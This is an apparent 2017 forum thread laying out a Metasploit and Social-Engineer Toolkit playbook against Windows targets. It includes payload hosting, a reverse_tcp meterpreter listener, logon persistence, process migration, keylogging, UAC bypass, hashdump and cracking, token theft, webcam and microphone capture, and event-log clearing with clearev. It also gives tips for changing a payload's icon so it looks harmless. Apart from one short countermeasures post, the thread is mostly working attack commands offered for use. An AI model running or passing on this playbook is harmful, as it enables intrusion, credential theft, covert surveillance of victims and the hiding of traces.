MSF SETOOLKIT PARROT OS PENTESTING CODE & EXAMPLES

View previous topic View next topic Go down

MSF SETOOLKIT PARROT OS PENTESTING CODE & EXAMPLES

Post by jamied_uk on 14th May 2017, 00:25






Code Examples should be used only within the scope of your local laws!
I accept no responsibility for you're actions! Please be ethical!

1st
Update & Upgrade (then reboot):


Code:
sudo apt update && sudo apt upgrade -y



Code:
sudo apt-get --force-yes install -y git apache2 python-requests python-pymssql build-essential python-pexpect python-pefile python-crypto python-openssl





2nd

Install setoolkit:

go into the folder you wish the setoolkit should be and then:

Code:
git clone https://github.com/trustedsec/social-engineer-toolkit.git



change your network settings so you have access from 10.0.0.0 to 192.168.0.0 for example!

Now To run...

Code:
sudo setoolkit


Now select Options in this order:



1, 4, 2

put your ext or int ip depending on how far reach you want (remote ip requires port forwarding to port 5555)

You should be able to use hostnames / Domain Names aswell as ip's

For example: jnet.sytes.net

now you can move payload (before you close setoolkit)



Move Payloads:

(Parrot OS)

Code:
sudo mv /root/.set/payload.exe /home/USERNAME/scripts/payloads
sudo cp /home/USERNAME/scripts/payloads/payload.exe /var/www/html

(Kali)


Code:
sudo mv /root/.set/payload.exe /root/Documents/Scripts/MSF/payloads
sudo cp /root/Documents/Scripts/MSF/payloads/payload.exe /var/www/html





Start your apache2 web server if required!

Code:
sudo service apache2 start

Now you can access via your ip http://youre-ip-here

now if you wish to make things faster you can create a file called Listener.sh here is the content of this file (used later)
Code:

#!/bin/bash
# Usage ./Listener.sh
#
sudo msfconsole -r meterpreter.rc

As you can see it uses the .rc file so heres the content of that file:


Code:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.101
set LPORT 5555
set ExitOnSession false
exploit -j -z
help




Ok lets continue on!


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

(you have to be in a session for upload and execution)!

Upload script txt file

Example:

(Parrot OS)

Code:
upload /home/USERNAME/scripts/MSF/update/script.txt c:\\Users\\Test\\Desktop


(Kali)

Code:
upload /root/Documents/Scripts/MSF/update/script.txt c:\\Users\\Test\\Desktop




Run script.txt: (FRom relative path)

Code:
resource update/script.txt



so if you start from a random path you will need the full path, Example:

Code:
resource /root/Documents/Scripts/MSF/update/script.txt



(so the file can be on the linux side only and still work on remote system without needing to upload)!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



After you have got a target you need to make it persistent! (@ logon)

Code:
run persistence -U -i 5 -p 5555 -r 192.168.0.101


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Dealing with sessions:



Code:
sessions -l          lists all sessions


sessions -i (id)     Interact with this session


sessions -k (id)     Kills sessions with that id


 

after you have joined a session you can add persistence! (do this before all else)!


Now you can migrate


type in an active session:


Code:
ps



to list processes and migrate (pid of explorer.exe


Code:
migrate 437



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

when you migrate to explorer.exe you can run key logger:


Code:
use sniffer


keyscan_start


keyscan_dump


keyscan_stop



You can use connect commands too:



Code:
msfconsole connect -S 192.168.0.15 -P 5555



Here are more random commands you can now go and learn about!

Code:
enable rdp
Code:
run getgui -e



create a new username after you have escalated privs


Code:
getgui -u username -p password





execute -h





execute -H -f cmd.exe -a */c net user username /delete"



Code:



getprivs





use priv




POST commands!
~~~~~~~~~~~~~~

Code:



run post/windows/gather/win_privs





search uac




use bypass uac option! after last command.


Code:
use exploit/windows/local/bypassuac





set payload windows/meterpreter/reverse_tcp








set LHOST 192.168.1.10


set LPORT 8887





session -l





set SESSION 1





exploit





background





sessions -i





sessions -i 2





migrate (pid of explorer.exe)




Code:
run post/windows/gather/hashdump



use jack the ripper to find password from hash!


Code:
run auxiliary/analyze/jt_crack_fast   < may not need



resource text.txt   (.txt file stored in /usr/share/setfile.txt    (text will hold the commands



Code:
cmd


netstat


ipconfig






Code:
resource /folder/file.txt

   (Linux location not windows) it is run on windows but held on linux)!





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

show current directory



Code:
getwd


Code:
Show Linux Directory

lpwd





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


forward to a diff port:

Code:
portfwd




see route:


Code:
route





Token stealing:


Code:
steal_token (PID)




Code:
ideltime



Code:




use sniffer



keyscan_start





keyscan_stop








keyscan_dump






~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Code:



screenshot





webcam_list








webcam_stream -h








webcam_chat








record_mic -h











clearv

(when finished)


More info can be found @

https://www.youtube.com/watch?v=BDBUG75529M&list=PLnjNR4-S-EVqfJWovxEJyb7I0IOkKkoYM&index=74

https://www.youtube.com/watch?v=IvfJgwwq9Xs&index=63&list=PLnjNR4-S-EVqfJWovxEJyb7I0IOkKkoYM

https://www.youtube.com/watch?v=biMkKqWMC5Y&index=58&list=PLnjNR4-S-EVqfJWovxEJyb7I0IOkKkoYM

https://github.com/trustedsec/social-engineer-toolkit


For more msf xploits

exploit-db.com/remote


More random commands:


Code:
use -l




Code:
sysinfo

   < to find username and os etc!




Code:
rdesktop  -u username -p password





Code:
lpwd

< linux current directory (msf)

get resource hacker to change icon of exploit or add a binary to it!



kill a msf session

Code:
sessions -k (id)

Now look into msfvenom, you can make payloads with this aswell!


Last edited by jamied_uk on 15th May 2017, 13:48; edited 8 times in total
avatar
jamied_uk
Admin

Posts : 2260
Join date : 2010-05-09
Age : 34
Location : UK

http://address-shortner.co.uk

Back to top Go down

Re: MSF SETOOLKIT PARROT OS PENTESTING CODE & EXAMPLES

Post by jamied_uk on 14th May 2017, 01:03

Countermeasures:


To find if you have any persistent things running on youre system open task manager

look for randomly named executable (close them if you know it is not legit)

after a few seconds it may come back, so do this...

press host key + r to open run dialogue box

type

Code:
msconfig


goto startup

and look for suspicous files running from you're temp directory, deselect these and save exit restart and re check again, also look in your startup locations (on start menu) and for linux os run

top look for anything you think shouldn't be running and google it, remove if required!

now upgrade your anti malware, anti virus, any spyware and update windows though its update service.


block all ports and apps on your router that you dont use and re enable if you do in the future!

get a hardware firewall like Cisco or another good managed switch so that you can only allow traffic you wish to!

now it is a good idea to look into IDS, Intrusion Detection Systems are good!!!


Reply with your comments!
avatar
jamied_uk
Admin

Posts : 2260
Join date : 2010-05-09
Age : 34
Location : UK

http://address-shortner.co.uk

Back to top Go down

Re: MSF SETOOLKIT PARROT OS PENTESTING CODE & EXAMPLES

Post by jamied_uk on 19th May 2017, 15:25

MSF Cheat Sheet

latesthackingnews.com/2015/09/07/metasploit-cheat-sheet-free-download
avatar
jamied_uk
Admin

Posts : 2260
Join date : 2010-05-09
Age : 34
Location : UK

http://address-shortner.co.uk

Back to top Go down

Re: MSF SETOOLKIT PARROT OS PENTESTING CODE & EXAMPLES

Post by jamied_uk on 3rd June 2017, 16:40

Unzipping Files Remotely MSF



Extra Content




I used my new Quick Reference Notes

jnet.sytes.net

Code:
sudo service apache2 start




Move Payloads:

Code:
sudo mv /root/.set/payload.exe /home/jay/MSF/payloads

sudo cp /home/jay/MSF/payloads/payload.exe /var/www/html





Code:
sessions -i 1





Persistence:

Code:
run persistence -U -i 5 -p 5555 -r domain.name.com








use sniffer
Code:



keyscan_start


keyscan_dump


keyscan_stop





~~~~~~~~~~~~~~~~~~
1st move in to relative path
Code:
lcd /home/jay/MSF/


upload payload.exe "C:\\payload.exe"

upload update/netcat.zip "C:\\\Backup\\netcat.zip"

upload update/netcat.zip "C:\\Users/Test\\My Documents\\netcat.zip"

upload update/netcat.zip





upload update/7z.exe "C:\\\Backup\\7z.exe"


upload update/script.txt "C:\\script.txt"
upload update/7z.exe "7z.exe"
upload update/7z.dll "7z.dll"





then type

Code:
shell



(in correct location for windows side) Unzip


Code:
7z x *.zip -o*



More On
superuser.com/questions/95902/7-zip-and-unzipping-from-command-line




Use Resorces:

resource update/script.txt


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

meterpreter> use priv
meterpreter> hashdump

cd\
resource script.txt


cd c:\\Users\\test\\Desktop\\


run winenum


https://www.offensive-security.com/metasploit-unleashed/existing-scripts/


Last edited by jamied_uk on 3rd June 2017, 18:41; edited 5 times in total
avatar
jamied_uk
Admin

Posts : 2260
Join date : 2010-05-09
Age : 34
Location : UK

http://address-shortner.co.uk

Back to top Go down

Re: MSF SETOOLKIT PARROT OS PENTESTING CODE & EXAMPLES

Post by jamied_uk on 3rd June 2017, 16:40

Check Out

youtube.com/user/Jamieduk999/videos
avatar
jamied_uk
Admin

Posts : 2260
Join date : 2010-05-09
Age : 34
Location : UK

http://address-shortner.co.uk

Back to top Go down

Re: MSF SETOOLKIT PARROT OS PENTESTING CODE & EXAMPLES

Post by Sponsored content


Sponsored content


Back to top Go down

View previous topic View next topic Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum